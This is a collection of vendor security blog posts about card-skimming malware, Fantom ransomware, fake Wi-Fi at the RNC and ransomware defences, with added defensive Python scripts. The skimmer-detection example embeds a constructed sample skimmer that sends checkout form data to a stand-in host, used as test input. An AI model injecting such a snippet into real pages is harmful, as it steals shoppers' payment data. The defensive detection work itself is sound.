About the Author

Michael Dortch

Malware in the News – and How to Beat It

If there is a news topic generating more “F.U.D.”—fear, uncertainty, and doubt—than politics in the United States, it just may be cybersecurity.

According to an October 14 report on SC Magazine UK, a Dutch security analyst has discovered that more than 5,900 e-commerce sites contain malware that steals victims’ credit card details.

How did hackers gain access to and infect so many sites with malware? Through various unpatched software flaws.

In a blog post outlining his research, Willem De Groot provides some chilling and disheartening details.

Here are some highlights:

  • Online skimming is the digital counterpart of physical skimming, in which legitimate point-of-sale card-reading hardware is replaced with (or overlaid by) look-alike hardware that captures and diverts payment information to malefactors. Online, the card reader is the checkout page and the look-alike is JavaScript injected into it.
  • Online skimming is more effective because a) it is harder to detect and b) it is near impossible to trace the thieves.
  • [H]ackers gain access to a store’s source code using unpatched software flaws in various popular e-commerce software.
  • Victims vary from car makers (Audi ZA) to government (NRSC, Malaysia) to fashion (Converse, Heels.com), to pop stars (Bjork) to NGOs [non-governmental organizations] (Science Museum, Washington Cathedral).

De Groot also contacted several merchants directly to inform them of the results of his research. Here are three of the responses he got:

  • “We don’t care, our payments are handled by a 3rd party payment provider.” Remember that many high-profile, high-value security breaches of retailer environments gained access through third parties.
  • “Thanks for your suggestion, but our shop is totally safe. There is just an annoying JavaScript error.” De Groot responds, “If someone can inject JavaScript into your site, your database is most likely also hacked.”
  • “Our shop is safe because we use https.” HTTPS (HyperText Transfer Protocol Secure) only encrypts traffic between the shopper’s browser and the merchant’s server. A skimmer script injected into the merchant’s own pages is delivered inside that encrypted connection and runs in the browser regardless; the padlock says nothing about whether the page content itself is trustworthy.
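The merchant responses above share one blind spot: nobody was looking at what scripts their checkout page actually serves. The following is an added example, not code from the original post or from De Groot’s research, that does that check. It inventories the script elements on a page, hashes inline script bodies, and diffs the result against a known-good baseline capture. The two sample pages and the hosts shop-example.invalid and stats-example.invalid are constructed for illustration.

```python
"""
Inventory the <script> elements on a checkout page and diff them against a
known-good baseline, to surface injected card-skimming JavaScript.

Added example; not code from the original post or from Willem de Groot's
research. The two sample pages and the hosts shop-example.invalid and
stats-example.invalid are constructed for illustration.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect external script locations and hashes of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # "host/path" strings, scheme and query dropped
        self.inline = []        # sha256 hex digests of inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            u = urlsplit(src)
            # Relative src (empty netloc) means same-origin. The query string is
            # dropped so a cache-busting ?v= bump does not look like a new script.
            self.external.append(f"{u.netloc}{u.path}")
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf).strip().encode("utf-8")
            self.inline.append(hashlib.sha256(body).hexdigest())
            self._in_script = False


def inventory(html: str) -> dict:
    """Return the set of external script locations and inline script hashes."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return {"external": set(p.external), "inline": set(p.inline)}


def diff_against_baseline(baseline: dict, current: dict) -> dict:
    """Scripts present on the current page that the baseline never contained."""
    return {
        "new_external": sorted(current["external"] - baseline["external"]),
        "new_inline": sorted(current["inline"] - baseline["inline"]),
    }


def scan(baseline_html: str, current_html: str) -> dict:
    return diff_against_baseline(inventory(baseline_html), inventory(current_html))


# Constructed sample: the page as captured when it was known to be clean ...
BASELINE_PAGE = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop-example.invalid/lib/app.min.js?v=3"></script>
<script>window.shopConfig = {currency: "USD"};</script>
</head><body><form id="pay"><input name="cc"><input name="cvv"></form>
</body></html>"""

# ... and the same page after a skimmer was appended. Only the extra inline
# block differs; the CDN version bump is a normal deploy and must not alert.
INFECTED_PAGE = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop-example.invalid/lib/app.min.js?v=4"></script>
<script>window.shopConfig = {currency: "USD"};</script>
</head><body><form id="pay"><input name="cc"><input name="cvv"></form>
<script>
document.forms[0].addEventListener("submit", function () {
  navigator.sendBeacon("https://stats-example.invalid/c", new FormData(document.forms[0]));
});
</script>
</body></html>"""


if __name__ == "__main__":
    for kind, items in scan(BASELINE_PAGE, INFECTED_PAGE).items():
        for item in items:
            print(f"UNEXPECTED {kind}: {item}")
```

Two practical notes. A skimmer can also be appended to an existing, legitimately named script file (same URL, changed contents), so a production version of this check should fetch and hash each external script body as well, not just the page. And it should run from outside the merchant’s own infrastructure: a compromised server can serve a clean page to its own monitoring and the skimmer to everyone else.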

For those of us who are planning to do any online shopping this holiday season, news like this gives new urgency to the phrase caveat emptor (“let the buyer beware”). Meanwhile, those who are operators of online commerce facilities should adopt a complementary phrase—caveat venditor, or “let the seller beware.” They should also patch the operating systems and applications upon which their operations rely more consistently.

As important as they are, though, timely software patches and upgrades are only elements of a truly effective strategy for combating cyber threats such as online skimming. Such threats depend largely on being able to infiltrate and populate a network with rogue software.

An effective protection strategy must therefore accomplish three things:

  • Detection—Know as quickly as possible when malware attempts to infiltrate or infiltrates a network, wherever that attempt or infiltration takes place.
  • Prevention—Prevent as many attempted malware infiltrations as possible. (This is a primary role of effective, comprehensive patch and update management.)
  • Remediation—Stop malware that successfully infiltrates a system from running and spreading to other systems or networks, and protect resources from the effects of successful infiltrations wherever they take place across a network.

The need for a multi-layered approach to cybersecurity is exactly why we created Endpoint Security Suite 2.0. This offering combines Shavlik Protect with AppSense Application Manager and AppSense Insight to deliver a solution that addresses all of the following: software whitelisting, secure standard configurations, timely patching of applications and operating systems, and administrative privilege restrictions.

That same need is also why we’ve enhanced LANDESK Security Suite with multiple features that enable more and better detection, prevention, and remediation. It’s also why we created LANDESK Workspaces for the Security Admin. It provides consolidated, comprehensive information about vulnerabilities, threats, and available patches, via a flexible, visual interface.

Whether or not your company sells online, cyber threats are many, varied, and dangerous to your users, your critical information resources, and your organization as a whole. To begin improving your protections today, read my colleague Brent Bluth’s blog post, I.T.’s a Real Ditch Sometimes: Time to Make a Switch, which discusses the importance of patching to your multi-layered cybersecurity efforts. Then, learn more about our solutions, online or from your LANDESK, Shavlik, or AppSense representative. Together, we can make your enterprise more secure and resistant to even the most modern, powerful cybersecurity threats.


Fantom Ransomware: Looks Like Windows. Disrupts Like Hell.

As if ransomware and Windows updates weren’t already challenging enough, a new threat pretends to be the latter but delivers the former.

If your organization has been deploying (or considering deploying) Windows 10, then you already know about the issues surrounding Microsoft’s shift to cumulative updates and the problems those updates have already caused with third-party applications at some companies.

Microsoft updates

Even if you’re not moving to Windows 10, you may still be affected by changes Microsoft is making to how it delivers updates to Windows 7 and Windows 8.1. And if you haven’t already, you should read the sagacious guidance offered in blog posts on these and related subjects by LANDESK Director of Product Management Stephen Brown and Senior Product Manager Chris Goettl.

In addition, you’ve doubtless heard and read about—or maybe even been affected by—ransomware.

Most ransomware infiltrates computer systems, locates and encrypts critical files, then demands a ransom for the keys needed to restore access to those files. A recent variant, known as “Hitler ransomware,” threatens to encrypt critical files but in reality deletes them. (Read more about this variant in blog posts by me and Stephen.)

Fantom ransomware

And now, there’s Fantom. Once it gets into a system, it looks and acts like a legitimate critical Windows update. As reported by Lawrence Abrams of BleepingComputer.com and others, it even displays a realistic-looking screen that says the updates are being configured.


What’s really going on, though, is that the software is busily encrypting all the files it can find. It then displays a poorly written ransom note.


Once that note appears, a user without a clean, current backup has no good option left: pay the ransom and hope that the decryption keys promised by that ransom note actually arrive, that they actually restore access to all of the files, and that the infection doesn’t result in further mayhem.

This is only one recent variation on the ransomware theme. Others can be at least as disruptive to your users and your business, if not more so. A ransomware variant known as “Petya,” for example, ignores your files and goes directly after the master boot records and file tables that govern access to entire hard drives.

Ransomware webinar on September 14

All of this is why we’re having a ransomware update webinar on September 14, featuring Stephen Brown and Principal Product Manager Eran Livne. (Eran’s also written some sagacious and helpful guidance for combatting ransomware, as have other members of the LANDESK team. You can browse, read, and share these in our ransomware archive.)

It’s also why we continue to evolve our solutions for fighting ransomware. In the webinar, Stephen and Eran will describe some specific upcoming enhancements to LANDESK Security Suite that can help you to defeat even the newest ransomware variants, and keep your organization’s computers and users productive and operational.

Get and stay ahead of the bad guys developing and distributing ransomware. Protect your organization, its users, and its critical information. Start now by registering for the webinar today!

Also, be sure to get your free copy of our most popular white paper below.


The Latest Shocking Ransomware Statistics and What You Need to Do

This past Wednesday, LANDESK hosted a webinar entitled “Ransomware: The NSA’s Top 10 Mitigation Strategies (and More).”

On that same day, ZDNet published an article that includes some fascinating—and frightening—findings from a recent survey of 540 CIOs, CISOs, and IT directors conducted by anti-malware specialists Malwarebytes.

Recent ransomware findings:

  • 40 percent of the businesses surveyed have suffered at least one ransomware attack in the past year.
  • 20 percent of the businesses surveyed “have had to stop operations entirely in the aftermath of a successful data breach.”
  • 34 percent of those businesses lost revenue as a result of ransomware attacks.
  • 60 percent of enterprise ransomware attacks each demanded a ransom of more than $1,000, and 20 percent demanded more than $10,000 each. Some ransom demands reported by survey respondents exceeded $150,000.
  • 63 percent of respondents said it took more than a full business day to install patches and “fix vulnerable endpoints” after a successful attack.

Perhaps most disturbing, according to Malwarebytes, is that the number of exploit kits carrying ransomware payloads has increased by 259 percent in the past five months alone. And since exploit kits are designed to make exploitation and malware delivery faster and easier, the number and severity of ransomware attacks are both likely headed in the same direction: up.

Given all of the above, it might be timely to assess your own enterprise’s preparedness to deal with ransomware. Fortunately for you, we’re here to help.

In our August 3 webinar, our Chief Security Officer Phil Richards summarized the findings and recommendations included in documents recently released by the U.S. National Security Agency (NSA), independently and in concert with more than a dozen other agencies.

He broke those findings and recommendations into six key areas. Here they are, ranked in order of importance based on poll question responses from webinar attendees.

Key recommendations:

  1. User education
  2. Data backup
  3. Network hardening
  4. Email hygiene
  5. System hardening
  6. Incident response

As Phil provided details about why each area is important and how best to implement it, I asked webinar attendees to indicate the implementation status of each at their own organizations. For each area, respondents were given four choices: comprehensive, extensive, limited, or none.

Here’s how the responses played out:

Category             Comprehensive   Extensive   Limited   None
User education                 23%         18%       32%    27%
Data backup                    45%         45%        9%     0%
Network hardening              32%         26%       37%     5%
Email hygiene                  17%         56%       22%     6%
System hardening               26%         58%       11%     5%
Incident response              16%         32%       42%    11%

Respondents ranked user education as the most important of the six areas. However, more than a quarter of them said that their organizations have no formal user education processes or requirements in place.

This may explain why 52 percent of them said that user education is the anti-ransomware effort they expect to pursue most aggressively in the next six to 12 months.

In contrast, only four percent of respondents plan to pursue incident response most aggressively during the same period.

Given that 53 percent have only limited or no formal incident response processes in place across their enterprises, this could come back to haunt some of them should they experience a ransomware- or malware-driven incident.

If poll respondents from our webinar are indicative, ransomware priorities and preparations are all over the map for many enterprises. Possibly including your own, unless you already have or are moving toward comprehensive implementations across all six areas discussed above and in our webinar.

Otherwise, you should grab the on-demand version of our webinar to get Phil’s detailed and cogent implementation recommendations.

More ransomware resources

You should also definitely check out my colleague Eran Livne’s magnum opus, Everything You Need to Know to Prevent Ransomware, and some of the other blog posts we’ve produced on the subject.

And if you aren’t already using LANDESK Security Suite, AppSense Application Manager, or any of our other solutions for stopping ransomware and other threats in their tracks, you should at least be considering them. Contact your LANDESK or AppSense representative, or visit the product pages online to learn more or to request trials or demos. And come back here often to see our latest thinking and recommendations.

Ransomware is a real and growing threat, and we’re here to help you to avoid becoming its next victim.


Wi-Fi Security at the Republican National Convention? Not So Much

Now that the Republican National Convention (RNC) is over, it’s time to review what may be the biggest story to come out of that event. It’s a story of widespread deception that fooled many, and the possible consequences of the success of that deception.

I’m talking, of course, about the duping of some 1,200 convention delegates, who were fooled into logging onto fake, “free,” public Wi-Fi networks.

Fake Wi-Fi Networks

Avast, an antivirus software purveyor, set up fake Wi-Fi networks with real-sounding network names (SSIDs) for a single day. And ignoring much of the non-political news of the day and any education they may have received at work, delegates connected.

“Some 68.3 percent of users’ identities were exposed when they connected, and 44.5 percent of Wi-Fi users checked their emails or chatted via messenger apps,” The Register reported on July 21.

In many cases, delegates were completely clueless about the risks they were taking. “With mobile devices often set to connect to known SSIDs automatically, users can overlook the networks to which they are connecting. Although convenient, this feature is eminently easy to exploit by cybercriminals who set up a false Wi-Fi network with a common SSID. Moreover, web traffic can be visible to anyone on any Wi-Fi network that is unencrypted. Any Wi-Fi that does not require a password is a risk,” the article added.
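The mechanism the article describes, a saved open-network profile that the device rejoins automatically, is something an endpoint can be audited for. The following is an added example, not code from the original post or from Avast’s experiment. It parses the text that `netsh wlan show profile name="<name>"` prints on Windows and flags profiles that combine open authentication with automatic connection. The three profile dumps embedded below are constructed samples with invented network names; on a Windows host the script collects the real ones.

```python
"""
Audit saved Wi-Fi profiles for the combination an evil-twin access point
relies on: open (password-less) authentication plus 'connect automatically'.

Added example; not from the original post or from Avast's experiment. It
parses the text that `netsh wlan show profile name="<name>"` prints on
Windows. The profile outputs below are constructed samples with invented
network names.
"""
import re
import subprocess
import sys

# Constructed: trimmed copies of what `netsh wlan show profile name="..."`
# prints for three saved profiles.
SAMPLE_OUTPUT = {
    "CoffeeShop Free WiFi": """
Profile CoffeeShop Free WiFi on interface Wi-Fi:
Profile information
    Name                   : CoffeeShop Free WiFi
    Control options        :
        Connection mode    : Connect automatically
        Network broadcast  : Connect even if this network is not broadcasting
Security settings
    Authentication         : Open
    Cipher                 : None
""",
    "Corp-Secure": """
Profile Corp-Secure on interface Wi-Fi:
Profile information
    Name                   : Corp-Secure
    Control options        :
        Connection mode    : Connect automatically
        Network broadcast  : Connect only if this network is broadcasting
Security settings
    Authentication         : WPA2-Enterprise
    Cipher                 : CCMP
""",
    "Hotel Guest": """
Profile Hotel Guest on interface Wi-Fi:
Profile information
    Name                   : Hotel Guest
    Control options        :
        Connection mode    : Connect manually
        Network broadcast  : Connect only if this network is broadcasting
Security settings
    Authentication         : Open
    Cipher                 : None
""",
}


def _field(text: str, label: str) -> str:
    """Value of a 'Label : value' line; empty string if the line is absent."""
    m = re.search(rf"^\s*{re.escape(label)}\s*:\s*(.*?)\s*$", text, re.MULTILINE)
    return m.group(1) if m else ""


def parse_profile(text: str) -> dict:
    return {
        "name": _field(text, "Name"),
        "connection_mode": _field(text, "Connection mode"),
        "network_broadcast": _field(text, "Network broadcast"),
        "authentication": _field(text, "Authentication"),
    }


def is_risky(profile: dict) -> bool:
    """Open auth + auto-connect: any rogue AP advertising this SSID is joined
    silently, and there is no credential that could fail to match."""
    return (profile["authentication"].lower() == "open"
            and profile["connection_mode"].lower().startswith("connect automatically"))


def audit(outputs: dict) -> list:
    """Return risky profiles as (name, probes_when_hidden) pairs. A profile set to
    connect even when the SSID is not broadcasting makes the device probe for it
    wherever it is, so the evil twin need not be anywhere near the real network."""
    findings = []
    for text in outputs.values():
        p = parse_profile(text)
        if is_risky(p):
            probes = p["network_broadcast"].lower().startswith("connect even if")
            findings.append((p["name"], probes))
    return findings


def remediation_commands(findings: list) -> list:
    """netsh commands that stop the auto-join, or remove the profile outright."""
    cmds = []
    for name, _ in findings:
        cmds.append(f'netsh wlan set profileparameter name="{name}" connectionmode=manual')
        cmds.append(f'netsh wlan delete profile name="{name}"')
    return cmds


def live_outputs() -> dict:
    """On Windows, collect the real profile dumps; elsewhere fall back to the sample."""
    if sys.platform != "win32":
        return SAMPLE_OUTPUT
    listing = subprocess.run(["netsh", "wlan", "show", "profiles"],
                             capture_output=True, text=True).stdout
    names = [n.strip() for n in re.findall(r"User Profile\s*:\s*(.+)", listing)]
    return {n: subprocess.run(["netsh", "wlan", "show", "profile", f"name={n}"],
                              capture_output=True, text=True).stdout for n in names}


if __name__ == "__main__":
    found = audit(live_outputs())
    for name, probes in found:
        print(f"RISKY: {name!r} open auth, auto-connect" + (", probes when hidden" if probes else ""))
    for cmd in remediation_commands(found):
        print("  ", cmd)
```

The audit only covers Windows laptops; phones keep their own saved-network lists, and the convention-floor devices in the story were mostly phones. The principle is the same on every platform: forget open networks after using them, and never let an open SSID auto-join.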

Now, none of the preceding paragraphs should be news to anyone carrying a smartphone, whatever the delegate selection criteria were for this event. But sadly, the RNC Wi-Fi debacle is more typical than exceptional.

People Open Phishing Attachments

In his recent blog post, Ransomware: The Threat and How to Protect Your Enterprise Part 1, my learned colleague Eran Livne noted that “23 percent of those who receive phishing emails open them, and 11 percent of those recipients click on attachments to those emails,” from the Verizon 2015 Data Breach Investigations Report.

Verizon also found that a phishing campaign of as few as ten emails was more than 90 percent likely to fool at least one recipient. This despite earnest user education efforts about ransomware, not to mention highly visible media coverage.

Which brings us to the crux of the issue: the all-too-human tendency to know, but not to do.

To Know, But Not to Do

“Currently, more than one in three American adults over 20 is obese—up from roughly one in four 20 years ago—and nearly 70 percent are overweight,” reported Catey Hill in a December 2015 MarketWatch.com article.

And those figures make weight loss big business.

“Companies that focus on weight-loss services (think Nutrisystem and Weight Watchers) raked in $6.3 billion in revenue in 2015, according to an IBISWorld report; sales of supplements—many of which promise weight loss—add billions more,” the article added.

By the way, that IBISWorld report estimated 2015 profits for weight-loss companies at $934.5 million.

The amazing thing about this market? Most weight-loss advice boils down to the same guidance: eat more mindfully and move more often. Which implies that most of us who struggle to avoid the “obese” category know what we need to do, but just don’t do it.

Wi-Fi security is a lot like weight loss. Tons of money gets spent on Wi-Fi security, but someone puts themselves, their personal information, and their company’s networks at risk every day by connecting to networks with no or inadequate security.

You Know What to Do, So Do It!

So, as Eran also said in his blog post, “…by all means, implement a user-education program—but also take at least some basic measures to protect the data on all endpoint devices.”

LANDESK can help, and you don’t even have to buy anything. Start by reading Part 1 and Part 2 of Eran Livne’s ransomware blog post.

Then, head for the LANDESK webinars page, and register for our August 3 webinar on: “Ransomware: The NSA’s Top 10 Mitigation Strategies (and More),” which will feature LANDESK CSO Phil Richards.

Don’t forget to check out some of our solutions for fighting ransomware and other IT threats, including our free white paper below. That way you can minimize the negative effects of that all-too-human tendency mentioned earlier, “to know, but not to do,” the next time it hits one of your colleagues. Or you. (Just sayin’.)


10 Effective Ways You Can Combat Ransomware Right Now

Ransomware is malware that infects computer networks, encrypts data across those networks, and then demands payment of a ransom to restore access to the hijacked data. The threat has already cost companies of all sizes and types millions of dollars in fines and lost productivity.

Ransomware attacks are growing in number and sophistication. Fortunately, there are simple and affordable measures you and your colleagues can take, beginning today, to lessen ransomware’s threat to your networks, your users, their productivity, and your organization’s critical data.

Here are ten ways your company can protect itself against ransomware:

1. Educate users about phishing emails and email attachments.

More than 20 percent of people who receive phishing emails open them. What’s worse, more than ten percent of people who open phishing emails also click on the accompanying attachments.

2. Patch critical operating systems and applications.

Doing this will greatly increase resistance to all types of threats and attacks, including ransomware. LANDESK’s Patch Manager applies patches across an enterprise automatically and easily.

3. Keep existing AV tools and other protections updated regularly.

In the face of ever-evolving threats, out-of-date protections offer no real protection at all.

4. Manage and limit the use of privileged accounts.

Ransomware and other attacks often use privileged accounts to spread themselves to other computers and networks.

5. Keep your backups complete and current.

Users can then get back to work more quickly and effectively, even if paying the ransom doesn’t restore access to data quickly, completely, or at all.

6. Implement and enforce access control, preferably focusing on data criticality and not just user rights.

This can limit the effects of attacks that get through your environment’s protective measures.

7. Impose restrictions on the types of files and folders your applications are allowed to access and manipulate.

Ransomware can’t use applications to encrypt data that those applications can’t access.

8. Disable macros in Microsoft Office files and elsewhere wherever possible.

Strike the best possible balance between protecting your environment and disrupting user productivity.

9. Implement trusted ownership of and access to applications and critical data.

Restrict or ban entirely applications, folders, and files that aren’t known to be from trusted sources.

10. Use virtualization and other technologies to isolate applications and files.

This will prevent them from spreading ransomware more broadly should they become infected.
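Step 8 is the one most organizations can verify in minutes, because Office macro behavior is governed by a handful of per-user policy values. The following is an added example, not code from the original post or from LANDESK or AppSense, that reads those values on a Windows endpoint and grades them against a hardening baseline. The registry location and the meaning of each VBAWarnings value are Microsoft’s documented Group Policy settings for Office 2016 and later; the snapshot the script uses when run off Windows is constructed.

```python
"""
Check Office macro policy values on an endpoint against a hardening baseline.

Added example; not from the original post or from LANDESK/AppSense. The
registry path and the meaning of each VBAWarnings value are Microsoft's
documented Group Policy settings for Office 2016 and later; the snapshot
used when this runs off Windows is constructed.
"""
import sys

APPS = ("Word", "Excel", "PowerPoint")
OFFICE_VERSION = "16.0"   # Office 2016, 2019 and Microsoft 365 all use this key
POLICY_PATH = r"Software\Policies\Microsoft\Office\{ver}\{app}\Security"

# HKCU\<POLICY_PATH>\VBAWarnings (REG_DWORD)
VBA_WARNINGS = {
    1: "enable all macros",
    2: "disable all with notification (Office default; user can click Enable)",
    3: "disable all except digitally signed macros",
    4: "disable all without notification",
}


def evaluate(snapshot: dict) -> list:
    """snapshot: {app: {"VBAWarnings": int|None,
                        "blockcontentexecutionfrominternet": int|None}}.
    Returns (app, severity, message) tuples; an app with no findings is compliant."""
    findings = []
    for app in APPS:
        vals = snapshot.get(app, {})
        vba = vals.get("VBAWarnings")
        block = vals.get("blockcontentexecutionfrominternet")
        if vba is None:
            findings.append((app, "warn",
                             "no VBAWarnings policy; effective default is 2, so the user can enable macros"))
        elif vba == 1:
            findings.append((app, "critical", f"VBAWarnings=1: {VBA_WARNINGS[1]}"))
        elif vba == 2:
            findings.append((app, "warn", f"VBAWarnings=2: {VBA_WARNINGS[2]}"))
        # With VBAWarnings=4 nothing runs anyway, so the Mark-of-the-Web block is moot.
        if vba != 4 and block != 1:
            findings.append((app, "warn",
                             "blockcontentexecutionfrominternet != 1: macros in files "
                             "downloaded from the internet are not blocked"))
    return findings


def read_policy_snapshot() -> dict:
    """Read the per-user policy keys on Windows (winreg is Windows-only)."""
    import winreg
    snapshot = {}
    for app in APPS:
        vals = {"VBAWarnings": None, "blockcontentexecutionfrominternet": None}
        path = POLICY_PATH.format(ver=OFFICE_VERSION, app=app)
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
                for name in vals:
                    try:
                        vals[name] = winreg.QueryValueEx(key, name)[0]
                    except FileNotFoundError:
                        pass            # value not set by policy
        except FileNotFoundError:
            pass                        # no policy key for this app at all
        snapshot[app] = vals
    return snapshot


# Constructed snapshot used off Windows: Word left at defaults, Excel opened
# wide, PowerPoint hardened.
SAMPLE_SNAPSHOT = {
    "Word": {"VBAWarnings": 2, "blockcontentexecutionfrominternet": None},
    "Excel": {"VBAWarnings": 1, "blockcontentexecutionfrominternet": 1},
    "PowerPoint": {"VBAWarnings": 3, "blockcontentexecutionfrominternet": 1},
}


if __name__ == "__main__":
    snap = read_policy_snapshot() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for app, severity, msg in evaluate(snap):
        print(f"{severity.upper():8} {app}: {msg}")
```

The balance the step talks about is the choice between VBAWarnings 3 (signed macros still run, which keeps line-of-business templates working) and 4 (nothing runs). Either is defensible; 2, the default, is not, because the “Enable Content” button is exactly what the phishing attachment asks the user to click.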

Any combination of the above steps, backed by tooling such as LANDESK Security Suite (LDSS), will make your computing environment much more secure and resistant to ransomware and other threats.

Don’t risk becoming ransomware’s next victim on its growing roster of targeted businesses. Get started today! Download our FREE whitepaper as a handy reminder of all the ways in which you can protect against ransomware now:


Security Salaries Are Soaring—What Should You Do?

“[V]acancies in cyber-security positions have skyrocketed as have CISOs salaries.…CISO salaries have gone up considerably in the last two years, with very few dropping below £100,000 (approximately US$146,000) a year.”

—“CISO salaries and demand for cyber-skills skyrockets, surprising no-one,” SC Magazine, Jan. 29, 2016

“Leading roles in cyber security, such as cyber security head, will see an increase of 18% in salary, while roles in cyber security analysis will see a pay rise of 7%.”

—“IT security salaries on the rise as cyber crime increases,” ComputerWeekly.com, Jan. 29, 2016

It is not news to most who follow the IT industry that there is a “skills gap” in the security arena, a gap that has in fact existed for some time. However, with the number, severity and costs associated with security breaches increasing dramatically since 2014, that gap and what to do about it is now top of mind for many IT and security decision makers.

Reputation: Why Your Business is Only as Good as its Least Reputable Application

Your company’s reputation is a cornerstone of its trustworthiness, which in turn directly affects its ability to thrive competitively. Or as world-famous investor Warren Buffett has said, “It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you’ll do things differently.”

The pervasive growth of IT in business has reduced the amount of time it takes to ruin a corporate reputation from five minutes to milliseconds. This is true because it takes only milliseconds for an attacker exploiting an application vulnerability to get into your network and begin disrupting your company’s ability to do business.

Your “ART-ful” Enterprise: Security and Trustworthiness

As discussed here previously, to become more “ART-ful,” your enterprise must become more agile, resilient, and trustworthy. This post digs a bit more deeply into trustworthiness, why it matters, how to achieve and sustain it, and the critical role of security in those efforts.

Let’s cut to the chase. There are likely no circumstances under which you would choose to do business with any person or business you could not trust.

Your “ART-ful” Enterprise: Security and Resilience

As discussed previously (in “Security and the ‘ART-ful’ Enterprise” and “Your ‘ART-ful’ Enterprise: Security and Agility”), to become more “ART-ful,” your enterprise must become more agile, resilient, and trustworthy. This post digs a bit more deeply into what business resilience (or its less common synonym, “resiliency”) is, why it matters, and how to achieve and sustain it.

As is true with business agility, business resilience is a much broader and deeper consideration than many typical discussions of the subject seem to indicate.